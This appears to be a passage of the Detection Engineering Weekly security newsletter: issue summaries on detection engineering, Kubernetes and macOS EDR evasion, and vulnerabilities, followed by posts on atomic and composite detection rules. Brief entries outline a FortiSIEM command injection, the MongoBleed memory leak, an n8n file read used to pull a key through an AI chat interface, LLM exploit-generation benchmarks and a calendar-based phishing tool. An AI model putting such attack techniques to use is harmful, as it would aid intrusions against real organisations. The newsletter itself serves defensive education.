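def coverage_loss(source_to_techniques: dict, removed: str) -> float:
    """Fraction of techniques that become undetectable if `removed` is dropped."""
    all_techniques = set().union(*source_to_techniques.values())
    remaining = set().union(
        *(techs for src, techs in source_to_techniques.items() if src != removed)
    )
    return len(all_techniques - remaining) / len(all_techniques)

# Hypothetical mapping of data sources to ATT&CK technique IDs.
SOURCES = {
    "process_monitoring": {"T1059", "T1053", "T1105", "T1027"},
    "network_traffic":    {"T1105", "T1071"},
    "authentication":     {"T1110", "T1078"},
}
# Dropping process monitoring here loses T1059, T1053 and T1027: 3 of 7 techniques.
```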

They also comment on how hard it is to build schemas and normalize telemetry so teams can write rules from a common lexicon. This highlights that a large swath of the issues we deal with sit in the software and data engineering components of our jobs just as much as in the threat research components.


Sigma Detection Classification by Cotool

Continuing Cotool’s research on security AI agent benchmark performance, they set up a website for tracking performance on their benchmarks and released a new one on Sigma detection classification. The goal of this benchmark was to assess how well foundational models were trained on attack tactics and techniques. The Cotool team fed the full Sigma corpus to 13 foundational models with the MITRE ATT&CK tags stripped, to see if the models could correctly map the tags back to each original rule.

Claude’s Opus and Sonnet 4.5 performed the best overall, with the highest F1-scores but also the highest cost, somewhat similar to what we saw in their last benchmark on the Botsv3 dataset. The team provided their analysis of these placements, their prompts, and the tradecraft behind the evaluation, so others can run the same benchmarks as well.
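Scoring a model’s recovered tags against a rule’s original ATT&CK tags reduces to a set comparison. Here’s a per-rule F1 sketch (my simplification, not Cotool’s actual harness):

```python
def tag_f1(predicted: set, actual: set) -> float:
    """F1 score for one rule's recovered ATT&CK tags vs. the originals."""
    if not predicted and not actual:
        return 1.0
    tp = len(predicted & actual)   # tags the model got right
    if tp == 0:
        return 0.0
    precision = tp / len(predicted)
    recall = tp / len(actual)
    return 2 * precision * recall / (precision + recall)
```

Averaging this over the full Sigma corpus gives a single per-model number to rank against cost.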


5 KQL Queries to Slash Your Containment Time in Microsoft Sentinel by Matt Swann

I have a biased view on what is and what is not a detection rule. Even to the point where I’ve reduced the concept of rules down to one definition: a rule is a search query. There is a rationale behind it: SIEMs and logging technologies require a search query to generate results. But, as I break out of my bubble, I notice that not all search queries have the same value from a detection point of view.

In this post, Swann demonstrates this concept through the lens of a security incident responder. When your goal is containment rather than a balanced cost of alerting, accuracy matters less; the point is to use your analysis skills to find and kick out threat actors as quickly as possible. Swann provides readers with five high-value KQL queries to help responders quickly orient around a potential intrusion. The cool part here is their unique experience in this field, even noting that some queries led to the discovery and containment of an active ransomware actor.


👊 Quick Hits

Detection as Code Home-Lab Architecture by Tobias Castleberry

I love seeing home-lab setups because there are many ways to set up an environment to practice advanced concepts with open-source and free software. This blog is part of a series by Castleberry where they document their journey from an analyst to a detection engineer, and they showcase some of their expertise and how they’ve learned along the way.


Building your own AI SOC? Here’s how to succeed by Monzy Merza

Speaking of demystifying AI SOC and agentic security engineering from Marks’ Gem listed above, this blog by Merza provides an irreverent commentary on the state of building these architectures. There are some non-negotiables Merza points out, such as data normalization, the concept of a “knowledge graph”, and honing foundational models and giving them the right instructions rather than relying on them out of the box.


The Levenshtein Mile by Siddharth Avi Singh

Before the age of LLMs, there was a ton of research into, and implementation of, some pretty clever mathematical techniques to find and detect threats. I used to work for a threat intelligence product company that specialized in detecting phishing infrastructure, and one of the key elements of finding phishing is understanding what the victim organization owns, so you can see how threat actors try to abuse and socially engineer its customers.

In this post, Singh details the Levenshtein distance algorithm. The basic premise is that you can measure the similarity between two strings and generate a score. If that score exceeds a similarity threshold, you can raise an alert for an analyst to investigate whether or not it is phishing. Domain names are the logical data source here; you can pull them from public domain registries, DNS traffic, or Certificate Transparency logs and try to proactively block lookalikes before they become an issue.
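The algorithm itself is compact: a standard dynamic-programming implementation, plus a hypothetical thresholding helper for the phishing use case:

```python
def levenshtein(a: str, b: str) -> int:
    """Minimum number of single-character edits (insert, delete, substitute)
    needed to turn string a into string b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        curr = [i]
        for j, cb in enumerate(b, 1):
            curr.append(min(prev[j] + 1,                 # deletion
                            curr[j - 1] + 1,             # insertion
                            prev[j - 1] + (ca != cb)))   # substitution
        prev = curr
    return prev[-1]

def looks_like_phish(domain: str, brand: str, max_distance: int = 2) -> bool:
    """Flag domains within a small edit distance of a monitored brand domain."""
    return 0 < levenshtein(domain, brand) <= max_distance
```

The threshold is the tuning knob: too loose and every typo squats an alert, too tight and paypa1.com slips through.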


☣️ Threat Landscape

After the Takedown: Excavating Abuse Infrastructure with DNS Sinkholes by Max van der Horst

This post by van der Horst helps readers understand what happens after a domain is sinkholed. We typically see news stories about a large botnet or ransomware operation being taken down, and the takedown includes seizing domain names used for command-and-control communications with victims. High fives and good vibes happen and then we focus on the next big thing.

van der Horst challenges this finality and tries to argue that a sinkhole is more than just an interruption operation; it’s also a forensic artifact that helps discover more victims and additional malicious infrastructure. They downloaded several datasets, combining passive DNS and open-source intelligence feeds, to understand the rate of disruptions and how to perform temporal analysis of these takedowns to discover unreported infrastructure.

It also allows analysts to cluster activity and create new detections as new botnets or campaigns emerge, where many cases involve the reuse of code and infrastructure techniques.


How to Get Scammed (by DPRK Hackers) by OZ

This is a great article walking through a single infection chain run by a Contagious Interview threat actor. OZ takes the bait on Discord and shows how the DPRK-nexus threat actor tries to infect him via a malicious coding test. OZ brings receipts: there’s a lengthy Discord conversation where the threat actor prods OZ and eventually convinces them to apply for the job.

There’s some cool analysis with cloning the repository and using docker and pspy to inspect the malicious traffic.


What’s in the box !? by NetAskari

NetAskari, a security researcher, stumbled upon a Chinese-nexus threat actor’s “pen-test” machine and managed to download a bunch of their custom tooling for analysis. The Chinese hacker ecosystem is in a bubble, the result of both cultural and artificial barriers imposed by the PRC. These barriers create opportunities to build tooling, exploits, and software in a silo, so when you find a goldmine of tooling sitting open for download, it’s always worth grabbing it to see how other hackers perform operations.

They found a litany of post-exploitation tools, some of which are custom-written and look similar to the likes of Cobalt Strike or Sliver, a bunch of custom Burp Suite extensions, and some malware families, like Godzilla, that were used in nation-state operations against the U.S.


Dutch police sell fake tickets to show how easily scams work by Danny Bradbury

I think phishing simulations at professional organizations are lame, but I actually think they work at scale against the general populace as a form of education. Apparently, the Dutch Police thought the same. They set up a fake ticket sales website and bought ads to trick victims into visiting and purchasing tickets for sold-out shows.

Tens of thousands of people visited the website, and several thousand people bought tickets, which is a wild stat if you want to steal some credit cards. Obviously, the Police did not steal credit cards; they used them as an educational opportunity to help folks understand the risks of online ticket fraud.


CVE-2025-64155 Fortinet FortiSIEM Arbitrary File Write Remote Code Execution Vulnerability by Horizon3.ai

From the blog:

CVE-2025-64155 is a remote code execution vulnerability caused by improper neutralization of user-supplied input to an unauthenticated API endpoint exposed by the FortiSIEM phMonitor service.

Oof. I couldn’t tell you the last time I saw a remote code execution vulnerability in SIEM technology.

The specific service, phMonitor, listens on port 7900. It serves as the control plane for these devices, much like the Kubernetes control plane, and supports orchestration and configuration API calls. I ran a quick scan of likely FortiSIEM devices on Censys and found over 5,000 publicly facing servers.

This blog has some details on the vulnerability, and, as with most FortiGuard and edge device vulnerabilities, user-supplied web request data with complex string parsing leads to a command injection deep within the application code.


🔗 Open Source

MHaggis/Security-Detections-MCP

Locally run MCP server for detection engineering. It leverages stdio transport, so nothing leaves your machine, which is always good if you are writing rules or queries that contain sensitive information. It exposes 28 tools that a local LLM client (Claude, Cursor) can use to examine detection coverage, MITRE classification, KQL queries, and data source classification.


SeanHeelan/anamnesis-release

PoC of an LLM exploit-generation harness. The README has an extensive background on how they benchmarked Claude Opus and GPT 5.2, measuring how fast the models can analyze a vulnerability and generate exploit code with no guidance. They introduced several constraints in test environments to challenge the models, such as removing certain syscalls, adding extra memory and operating-system protections, and forcing the agents to generate an exploit with a callback.


tracebit-com/awesome-deception

Yet another awesome-* list on deception technology research, open-source repositories and conference talks.


mr-r3b00t/rmm_from_shotgunners_rmm_lol/main/mega_rmm_query.kql

This repository caught my eye because I’ve never seen a rule that started with the word “mega”. And when I say mega, I’m thinking a few hundred lines for something pretty complicated. But this RMM detection query rule is 3,000 lines long. Can you imagine needing to tune this?


ineesdv/Tangled

This is a clever phishing simulation platform that abuses iCalendar rendering to deliver legitimate-looking phishing invites. It leverages research from RenderBender, which abuses Outlook’s insecure parsing of the Organizer field.

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

Received — 14 January 2026 Detection Engineering Weekly

DEW #141 - K8s Detection Engineering, macOS EDR evasion, Cloud-native detection handbook

14 January 2026 at 14:03

Welcome to Issue #141 of Detection Engineering Weekly!


✍️ Musings from the life of Zack:

  • It was a long but restful month away from you all! I can’t wait to get back into writing every week for y’all

  • 🤝 I am accepting new sponsors for 2026! If you are interested in sponsoring the newsletter, shoot me an email at techy@detectionengineering.net. We are already almost halfway booked for Primary slots and now have Secondary slots so you have options!

  • I’ve started writing again for the Field Manual and I really love encapsulating my experience and knowledge into these posts. If you have ideas for Field Manual posts, comment below. I have my latest post below as the last story under State of the Art

This Week’s Primary Sponsor: Push Security

Want to learn how to respond to modern attacks that don’t touch the endpoint?

Modern attacks have evolved—most breaches today don’t start with malware or vulnerability exploitation. Instead, attackers are targeting business applications directly over the internet.

This means that the way security teams need to detect and respond has changed too.

Register for the latest webinar from Push Security on February 11 for an interactive, “choose-your-own-adventure” experience walking through modern IR scenarios, where your inputs will determine the course of our investigations.

Register Now


💎 Detection Engineering Gem 💎

A Brief Deep-Dive into Attacking and Defending Kubernetes by Alexis Obeng

For detection engineers, incident responders, and threat hunters who operate in a cloud-first environment, you’ve probably heard developers in your organization talk about Kubernetes (k8s for short). It’s an extremely popular container orchestration framework that has become the de facto standard for controlling scaling, application isolation, and cost. Whether you run it in your environment or you’ve never touched it, it’s important to understand how security controls and detection opportunities work inside these environments, because Kubernetes is like an operating system of its own.

When Obeng first shared this research on a Slack server I was on, I was excited to read it because it’s truly a deep dive into Kubernetes security, as the title suggests. She started the blog by describing how unfamiliar this space was, and by the end, you could tell Obeng had become very familiar with detection and hunting scenarios in Kubernetes.

The blog starts with an introduction to k8s and breaks down the jargon, architecture, and nuances of how a Kubernetes environment operates. The most important thing I try to get folks to understand with k8s is that it’s separated into two detection planes. The control plane, as Obeng explains, “is the core of Kubernetes.” It helps control everything from scaling plans, what containers to run, permissions, and health checks.

The other plane, the data plane, is everything else. The hyperscalers describe this as the service’s core functionality. Since k8s’ functionality revolves around running containers, you could argue that it’s about each individual container and the isolation of those containers within k8s.

As you can see from the threat matrix, attacks along MITRE ATT&CK operate in both planes.

After giving this introduction, she jumps into several attack scenarios. But the scenario section opens with her description of the k8s attack surface, and this is my favorite part of the blog. Obeng outlines four major weak points you’ll see in any k8s attack: pod weaknesses, identity and access mechanisms, cluster configuration, and control plane entry points. Notice these all treat the control plane as the end goal: if you compromise any part of the data plane, the main objective is usually to attack the control plane afterward.

She ends the blog with close to 10 attack scenarios, detection rules using Falco, and a follow-up with her lab for folks who want more hands-on learning.


🔬 State of the Art

EDR Evasion with Lesser-Known Languages & macOS APIs by Olivia Gallucci

~ Note, Olivia is my colleague at Datadog ~

EDR blogs from independent researchers are hard to find. It's not that the blogs are tucked away in dark corners of the Internet; rather, EDR researchers who don't work at vendors are few and far between. So, anytime I see research that goes deep into the EDR space, I pay close attention.

This is especially true for the macOS world. Microsoft has years of security solutions and a litany of researchers who document all kinds of peculiar malware and EDR behavior. This is logical, since most major security incidents over the last 30 years have been on Windows platforms. But in the last few years, attackers have shifted their focus to macOS. The opaqueness-by-design of EDR vendors AND Apple makes it hard to learn about security internals on this platform.

This technical analysis by Olivia helps break down those barriers by first describing the ecosystem of opaqueness of macOS combined with security vendor technologies. From my understanding (and after lots of stupid questions from me to Olivia), macOS EDRs rely on Apple's Endpoint Security (ES) framework, which is somewhat equivalent to Linux's eBPF observability and security framework. Security vendors subscribe to security events, build detections over them, and implement EDR response features, such as blocking a piece of malware from executing.

This has its limitations, and Olivia's analysis under her "Technical Analysis" section points them out. It's reminiscent of the early days of Microsoft security, when bypasses emerged from malware families and it took a lot of effort for vendors and Microsoft to respond. The closed ecosystem has its advantages from a security controls perspective, but IMHO, it starts to do a disservice to organizations when attackers move faster than the controls you try to implement.


The Cloud-Native Detection Engineering Handbook by Ved K

This post is an excellent follow-up to Obeng's blog, which is under the Gem at the top of the newsletter!

Detection engineering is much more than building detection rules. There are elements of software engineering, data analysis, and threat research that separate a good detection engineer from a great one. I've talked about this across my publication, podcasts and conference talks. But if you want a deep dive on how to build and apply these skillsets, Ved's blog is a great resource.

Ved defines cloud-native detections as any research, engineering and implementation of a detection rule to identify threat activity in cloud environments (AWS, Azure, GCP) and Kubernetes. He then describes his nine-phase (!) approach to writing detections, and opens each subsection with what “hat” you should be wearing.

The value of this post lies in the diligence put into each phase, especially the use of real-world examples. The sections are bite-sized, so I wasn't phased (ha!) by the number of them. It serves more as a handbook for you to reference as you move through the detection lifecycle.

My favorite section is under Phase 4, titled “Enrichment and Context.” It ties nicely with my piece about context and complexity within rules, and according to Ved, it does require a Software Engineering Hat. Ved lists out five critical pieces of context to help increase the efficacy of rules:

  • Identity Context: who is this (human) or what is this (service-account).

  • Threat Intelligence: what IP addresses, domains, or general knowledge around indicators of compromise do we have to help make decisions on this activity?

  • Resource and asset metadata: What critical asset inventories, compliance tags or posture related information exists to help identify the riskiness of this asset being attacked?

  • Behavioral baselines: is this normal behavior for this type of activity? Think Administrator activity at 2am on Saturday.

  • Temporal context: Attacks aren’t point-in-time, they are over a period-of-time. Can you enrich this alert with other context of events before it occurred?
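As a rough illustration, here's how these five enrichment points might attach to an alert in Python. This is a hypothetical sketch, not Ved's implementation; the field names, lookup tables, and values are all invented for the example.

```python
# Hypothetical enrichment step: attach identity, threat intel, asset,
# baseline, and temporal context to a raw alert before triage.
THREAT_INTEL = {"203.0.113.7"}                       # known-bad IPs (example data)
ASSET_TAGS = {"i-prod-db-01": {"criticality": "high", "compliance": "pci"}}
BASELINE_HOURS = range(9, 18)                        # this identity's normal working hours

def enrich(alert, recent_events):
    """Return the alert with the five pieces of context Ved describes."""
    # Identity context: human vs. service account
    alert["identity_type"] = "service-account" if alert["user"].startswith("svc-") else "human"
    # Threat intelligence: does the source IP match a known indicator?
    alert["ti_match"] = alert["src_ip"] in THREAT_INTEL
    # Resource and asset metadata: how risky is the target asset?
    alert["asset"] = ASSET_TAGS.get(alert["resource"], {"criticality": "unknown"})
    # Behavioral baseline: is this activity outside normal hours?
    alert["off_hours"] = alert["hour"] not in BASELINE_HOURS
    # Temporal context: what happened just before this alert?
    alert["preceding_actions"] = [e["action"] for e in recent_events]
    return alert
```

An analyst, or a downstream composite rule, can then score the alert on the combination of these fields instead of the raw event alone.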

Ved finishes the post by writing a detection, testing it, following it through deployment, and evaluating how useful the alert is. It looks like this is his first post on his Substack, so I recommend subscribing!


How to defend an exploding AI attack surface when the attackers haven’t shown up (yet) by Joshua Saxe

This is a fantastic commentary on what happens when the security community knows that a new technology is going to bring all kinds of security issues, even though the issues haven’t materialized yet. Saxe’s framing revolves around the growing attack surfaces around AI technologies. It’s hard to parse marketing-speak and LinkedIn ads and messages from startup founders and salespeople claiming that “the bad guys are already using AI at scale to attack you!!11” without much proof. Perhaps they reference a news article about some basic usage of vibecoding malware, or a phishing site that has an HTML comment of “created by Claude Code.”

Saxe has recommendations around what security functions and specific teams can do to prepare for this, and I will steal his framing around making controls and policies "dialable". Security should aim to be an enabler rather than a disabler for its engineering and technology counterparts. So build security engineering controls and implement detection & response processes, but configure them so you can "dial up" the strictness as new attacks emerge from real scenarios rather than theoretical ones.


Introducing Pathfinding.cloud by Seth Art

~ Note, Seth is my colleague at Datadog ~

Seth recently released a comprehensive library of privilege escalation scenarios and techniques abusing IAM in AWS environments. There are 65 total paths, and 27 of them are not covered by existing OSS tools that test coverage. The good news is that the website has a description of each attack and how to perform it, as well as a helpful graph visualization so you can see the traversal rather than try to create an image in your head.


📔 Field Manual

I wrote a Field Manual issue on Atomic Detection Rules over break! Please go check it out!


☣️ Threat Landscape

The Mac Malware of 2025 👾 by Patrick Wardle

This blog is a comprehensive look back at Mac malware incidents and research throughout 2025. Maybe I am showing my age, but if you told me 10 years ago that macOS's popularity would explode among cybercriminal groups, leading to large-scale compromises, I would have laughed at you. Wardle lists the top malware families and some associated incidents and blogs dissecting the malware, and walks through analysis of the malware using an open-source toolbox.


Researcher Wipes White Supremacist Dating Sites, Leaks Data on okstupid.lol by Waqas Ahmed

lmao


🌊 Trending Vulnerabilities

MongoDB Server Security Update, December 2025

I’m a bit late on this one due to holidays and time off, but MongoDB recently disclosed a critical vulnerability dubbed “MongoBleed” under CVE-2025-14847. It allows an unauthenticated attacker to connect to a MongoDB instance and leak memory contents, which can potentially contain sensitive information such as data stored in Mongo, authentication data, and cryptographic material.

I’m impressed with the transparency and diligence in the post. MongoDB found the vulnerability internally, validated it, built a patch, notified customers and rolled out a post. A researcher at Elastic published a PoC two days later (on Christmas, no less) that I’ll link below.


Ni8mare  -  Unauthenticated Remote Code Execution in n8n (CVE-2026-21858) by Dor Attias

n8n is an open-source workflow framework for building Agent-to-Agent systems. They recently disclosed two vulnerabilities, CVE-2026-21858 and CVE-2026-21877, scored 9.9 and 10.0, respectively. n8n itself has skyrocketed in popularity primarily due to its ease of use for interfacing with agentic workflows and platforms. The 0.1 difference comes down to impact: 21858 is an arbitrary file read, which could allow reading secrets from a target system, while 21877 is full remote code execution.

I really enjoyed the technical detail of this post by Attias, which focuses on the arbitrary file read vulnerability. When you think of arbitrary file reads in a modern application stack like n8n, you can pull a lot more credentials than just dumping password files. Attias created a clever scenario: reading arbitrary session files and loading them into n8n's knowledge base, allowing extraction of the key from the chat interface itself.


🔗 Open Source

heilancoos/k8s-custom-detections

Kubernetes lab environment and corresponding detection rules from Obeng’s gem above.


appsecco/vulnerable-mcp-servers-lab

Hands-on lab for testing security vulnerability knowledge against MCP servers. There are nine scenarios, and each one looks pretty reasonable in its real-world applicability. You'll need Claude and Python to run each one, and luckily, with MCP, you can specify the singular Python file within the Claude config and get everything you need to get started.


Adversis/tailsnitch

Tailsnitch is a posture management tool for Tailscale configurations. You give it a Tailscale API key, and it connects to your tenant's API and compares its configuration to secure baselines.


joe-desimone/mongobleed

Original PoC of CVE-2025-14847, a.k.a. MongoBleed, dropped right on Christmas :|. It includes a docker-compose file so you can safely test it yourself.


kpolley/easy-agents

This is a nice example of what I think will be a normal detection and response engineer’s setup in the next few years. Your org will operate a repository with agent setups for technology like Claude code, and it’ll contain a standardized list of MCP servers to use and agent instructions. Making it extendable to tweak or add agents and MCP servers should be as easy as another prompt and some glue work for a custom MCP.

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!


What are Composite Detections?

7 January 2026 at 02:48

Atomic Detection rules are critical building blocks for a detection engineering function. They provide visibility into singular event or indicator-based threat activity within an environment. The rules are narrow in scope and generally lack context for the blue teamer’s environment and the threat actor performing the malicious action. For example, an atomic detection rule can inspect Administrator logon activity in a cloud environment and generate an alert whenever an Administrator logs in. This captures malicious admin compromises (high recall), but also triggers on every legitimate admin login (low precision), flooding analysts with false positives.

This tradeoff also works in the opposite direction on the precision-recall spectrum. A detection engineer can deploy an atomic rule that is so precise it becomes brittle. It may never generate an alert because the fields it tries to capture are so specific that they offer low operational value.

The Detection Engineering Field Manual is a series dedicated to sharing knowledge and my experience building, operating and scaling a detection engineering organization at a F500 tech company. Please like and subscribe if you find this series useful!

The way to combat these shortcomings is to increase the context around the attack itself. This means capturing more threat activity to group atomic detections together, as well as increasing the context of the environment to differentiate benign and malicious activity. Composite detections, also known as correlated or stateful detections, increase the context and, therefore, the complexity of writing and maintaining the rule.

This field manual post covers (ha!) the pros and cons of composite detection rules and begins to explore strategies to expand context around threat activity.

Detection Engineering Interview Questions:

  • What is MITRE ATT&CK?

  • What is a composite detection rule?

  • Explain a threat activity scenario where a composite detection rule helps reduce false positives.

  • How do composite rules increase operational complexity for a detection engineer?

MITRE ATT&CK

MITRE ATT&CK (pronounced “MY-ter AT-ack”) is the industry standard for modeling threat activity. According to their main website:

“MITRE ATT&CK® is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.”

There is no modern detection engineering and incident response without MITRE ATT&CK. It serves as a lexicon for security engineers across red and blue teams to standardize on how a specific attack occurs and the telemetry it generates.

Tactics run along the X-axis of the ATT&CK matrix and represent the stages an attacker traverses to achieve an objective, such as exfiltrating sensitive data, deploying ransomware, or causing a denial of service. Ransomware deployment is the end goal, but it requires a lot of steps to achieve that impact: for example, getting access to a victim machine, laterally moving to a domain controller, collecting secrets and cracking administrator passwords, and finally finding a way to deploy the ransomware.

The Techniques are the Y-axis under each Tactic. Techniques are the how: specific methods adversaries use within each tactic to achieve their objective. For example, Network Share Discovery under Discovery is used by attackers to find interesting files, folders and target machines connected to the current machine. They can leverage this to perform Collection of sensitive information and perform Lateral Movement to a higher privileged victim machine.

The beauty of MITRE ATT&CK is that it directly contradicts the adage “attackers only need to be right once, defenders have to be right 100% of the time.” Each technique listed above has associated telemetry, detection opportunities, and some even have threat groups that leverage the documented techniques.

What does this have to do with Composite Detections?

In my last post on Atomic Detections, I talked about how Atomic Detection rules lack context. These rules can use threat intelligence, such as malicious IP addresses, to generate alerts, but those IP addresses can be rotated, making the rule very noisy. So you wouldn't want to run that rule beyond the window in which the IP address remains malicious.

On a separate Atomic Detection rule, a detection engineer can write a rule to alert on Network Share Discovery. This is an obvious choice from my example before: the next logical step after Network Share Discovery is Lateral Movement. We want to detect that, right?

The problem here, again, becomes context. What if a legitimate process, such as a file search or data backup tool, performs Network Discovery? You generate an alert, block the activity, and have just killed productivity or a critical business process for one of your users. Does this mean you need to painstakingly investigate every Network Discovery alert? You could, but you would burn out, and the operational costs would be too high.

This is where Composite Detections can help, and where MITRE ATT&CK enables context via chains of events. By correlating Network Share Discovery with subsequent Lateral Movement attempts, we filter out benign activity and surface actual threats.

Composite Detections Tell a Story

Let’s continue to challenge the adage “attackers only need to be right once, defenders have to be right 100% of the time.” We know that writing one Atomic Detection rule can be noisy. So what if you write two? What if you write these rules across every single path along MITRE ATT&CK, under every Tactic? You would have high recall, but terrible precision, and a flurry of alerts that can’t discern between benign and malicious activity.

Let’s look at an example from our previous post on Atomic Detection Rules:

In this scenario, the Atomic Detection rule fires on administrator login activity. We are only looking at the event and ignoring sourceIP, timestamp, and location. These can help tell the story, but the story stops at the singular event. You could write some additional enrichment to tell the story that:

  • The Admin is logging in from a risky location, let’s say outside the U.S. for the sake of example

  • The Admin is logging in past business hours

But these enrichment points can also be part of legitimate business activity. This is where context comes into play.

Let’s say you have two other rules that capture potential threat activity of an Administrator creating a second account and attaching an Administrator policy or profile to it. It’s riskier (it’s further along the ATT&CK chain), but it lacks context. But what if you combine the threat scenarios and create a story?

Here’s the story: an Administrator account gets compromised, and an attacker runs a script to log in to your AWS portal automatically. They are smart cookies and believe in another adage, “two is one, and one is none,” and create a second account to achieve Persistence on your account. They then leverage their Administrator privileges to attach an Administrator policy. Smart, if you reset the original Administrator password, they have a backdoor back into your environment!

By combining the three scenarios via the following rule, in pseudocode:

if a user containing 'admin' logs in
AND CreateUser is called
AND AttachUserPolicy is called with Policy = 'Admin'
ALL WITHIN a 5-minute window
THEN alert

You’ve told your SIEM quite a compelling story to look out for, and it found it!
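Sketched in Python, a minimal version of this windowed correlation could look like the following. The event shapes, field names, and five-minute window are assumptions for illustration, not a production SIEM implementation:

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # assumed correlation window

def composite_alert(events):
    """Fire when an admin login, CreateUser, and AttachUserPolicy('Admin')
    all land within the same five-minute window."""
    events = sorted(events, key=lambda e: e["time"])
    for login in (e for e in events
                  if e["action"] == "ConsoleLogin" and "admin" in e["user"]):
        # Collect every event inside the window that starts at this login
        window = [e for e in events
                  if login["time"] <= e["time"] <= login["time"] + WINDOW]
        created = any(e["action"] == "CreateUser" for e in window)
        attached = any(e["action"] == "AttachUserPolicy" and e.get("policy") == "Admin"
                       for e in window)
        if created and attached:
            return True  # all three atomic signals inside one window
    return False
```

Each condition on its own is a noisy atomic rule; requiring all three inside one window is what turns them into a story.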

There are some key questions from the above rule, and they emerge from the other data I’ve omitted from my diagram:

  • What is a legitimate amount of time between logging on and calling CreateUser?

  • Is calling CreateUser then attaching an Administrator policy malicious?

  • Does this Admin typically CreateUser and attach policies?

These questions are what adds complexity and cost to writing and maintaining a ruleset. So, a detection engineer must weigh the cost of this complexity versus the cost of false positives from Atomic rules.

In this specific Composite rule, we used Windowing. Windowing is a technique in which we capture activity in time windows and assume that any Composite detection that captures events within that window must be the result of threat activity. The rule assumes that if an Administrator account logs in, creates a secondary account, and attaches a privileged policy to it, it must be malicious. This reduces false positives by:

  • Combining three Atomic rules into one rule

  • Creating a story where these three actions together mean something malicious is happening, or at least requires investigation

  • Assuming threat actors will try to do this quickly, as their access may be revoked within a few minutes

Stories increase complexity

I linked a chart in my previous post about the trade-off between context, operational cost and false-positive reduction.

In this Windowed Composite Detection Case, there are several costs that detection engineers incur:

  • Does my SIEM technology support Windowing?

  • Does the combination of these detection rules capture the threat activity that I want? For example, should I also have a separate atomic rule for CreateUser to catch persistence attempts that don’t fit the 5 minute window? This can lead to false negatives if you only rely on composite rules.

  • Does the window period give me the best value? If I increase it to 15 minutes, what costs do I incur on server usage, indexing and other infrastructure components?

I will say that Detection Engineers I’ve hired, worked with, and spoken with at other companies spend as much time researching cost trade-offs as they do performing pure security research. This is the Engineering component of threat detection, and to me, these types of problems are what make the field exciting. You are part security researcher, part engineer, and part data scientist!

Conclusion

Composite detections shift detection engineers’ focus to reduce false positives by creating stories of attack chains. MITRE ATT&CK is the de facto industry standard for documenting how an attacker progresses through a breach to achieve an objective. Detection engineers can use ATT&CK to build atomic and composite rules to capture threat activity.

Atomic rules lack context by design, but when combined with other atomic rules via composite detections, you can start building a story of an attack. This story is the context you need to decide whether you should investigate an alert. It also reduces false positives by capturing the logical progression an attacker may take in your environment, reducing the likelihood of alerting on benign activity.

The complexity of creating and maintaining composite detections stems from technological capabilities, such as windowing, as well as the hidden costs of assumptions made by the detection engineer. For example, combining three distinct events into a composite detection may miss other alerting scenarios within those events, leading to a false negative.

In the next Field Manual post, we'll explore different alerting mechanisms for composite and atomic detections outside of windowing.

The Detection Engineering Field Manual is a series dedicated to sharing knowledge and my experience building, operating and scaling a detection engineering organization at a F500 tech company. Please like and subscribe if you find this series useful!

What are Atomic Detection Rules?

15 December 2025 at 15:55

In the last post, we discussed the tradeoffs in designing effective rules. Detection efficacy captures the needs of the consumer of your detection rules, because a given persona may be more concerned with missing an alert (false negatives) or with having too many alerts that don't matter (false positives).

Finding attacks is the core value proposition of what detection engineers do, and it’s what makes this field technically challenging. Although difficult, this work has an art and aesthetic that is hard to find anywhere else in security. This is because you aren’t solving a machine-to-machine problem, but a human-to-human problem, and the other human is unwilling to cooperate with you. To me, detection engineering and blue teaming, overall, are studies of behavior.

Detection Engineering Weekly is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.

In this post, we’ll begin looking at how rules detect threat activity through atomic detections.

Detection Engineering Interview Questions:

  • What is the Pyramid of Pain?

  • What is an atomic detection rule?

  • Compare and contrast scenarios where an atomic detection rule can be effective or ineffective.

  • What is environmental context?

David Bianco’s Pyramid of Pain

Some attacks generate telemetry that is easy to identify as an attacker on your system or networks. Many attacks, however, require logic that depends on telemetry availability, environmental context, index windows of logs arriving at the SIEM, and understanding of attacker tradecraft or behavior.

Much as detection engineers must consider operational costs when writing rules, threat actors incur costs when carrying out attacks. This cost-versus-cost battle helps frame attack and defense: you want to impose as much cost as possible on an attacker's operations, causing so much pain that they deem a tactic or technique not worth their time. This is where the "Pyramid of Pain" by David Bianco becomes a valuable exercise for security teams.

At its core, the Pyramid of Pain challenges defenders to focus on imposing as much pain on attackers as possible. As you traverse up the pyramid, the operational cost of your efforts increases, but so does the amount of pain you cause an attacker. Each layer of the Pyramid represents an operational complexity the threat actor must consider when staging an attack. Near the top, if you detect Tools executing in your environment, your detections are more robust because the order and context of the tool's execution become irrelevant.

The best state is under "Tactics, Techniques and Procedures" (TTPs). This layer focuses on the behavioral aspect of an attack. If you detect the behavior of an attack, every layer below it becomes less relevant to your detection (for the most part), and the detection is robust enough to catch changes in Tools, Artifacts, Domains, IP addresses, and hashes.

Imagine this: you write a rule that helps detect a known Command-and-control (C2) server you read from a blog post. You deploy that rule and it doesn’t find anything. Great, you aren’t compromised, and you’ll have great coverage for the future if there is a compromise.

Here’s the problem: threat actors are well aware that we find C2 servers, build rules, share them with the community, and blog about them. A C2 server is typically either an IP address or a domain. Have you ever rented a droplet on DigitalOcean, or bought a domain from Namecheap? You can spend a few dollars to rent more droplets or buy new domains. This incurs minimal pain on the threat actor's side, and defenders can no longer block the new C2 server until it is discovered again.

Even worse, the IP address you wrote a rule for is now leased to a benign client, and your rule is alerting on benign traffic, causing pain to you and your team.

So, how effective is your detection rule now? Not too effective! This is because detecting on a singular value, such as an IP address or a domain, is an Atomic Detection. Atomic Detections are narrowly defined rules that detect activity at a point in time with little to no context. Let’s dive into them in the next section.

Atomic Detections Lack Context

Atomic Detections are tactical in nature. They may seem precise in practice, but because they lack context from the environment and impose little pain on attackers, they become brittle and prone to false positives. As soon as an attacker changes their infrastructure or flips one bit in a new build of their malware, which changes the cryptographic hash value, your rule diminishes in quality.

Atomic Detections also exist for host and network activity. The point here is that ignoring context in an environment, with rules that don't evaluate timing, environmental context, or regular baseline activity, makes atomic rules risky to deploy.

